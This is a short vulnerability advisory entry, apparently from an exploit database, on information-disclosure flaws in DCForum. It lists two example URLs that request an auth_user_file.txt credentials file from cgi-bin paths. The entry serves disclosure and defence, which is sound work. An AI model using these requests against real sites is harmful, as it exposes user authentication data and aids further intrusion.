DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities

Author: r45c4l
type: webapps
platform: php
port: 
date_added: 2012-11-02  
date_updated: 2017-11-02  
verified: 1  
codes: OSVDB-91611  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38007.txt  

source: https://www.securityfocus.com/bid/56383/info

DCForum is prone to multiple information-disclosure vulnerabilities.

Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.

http://www.example.com/cgi-bin/User_info/auth_user_file.txt
http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt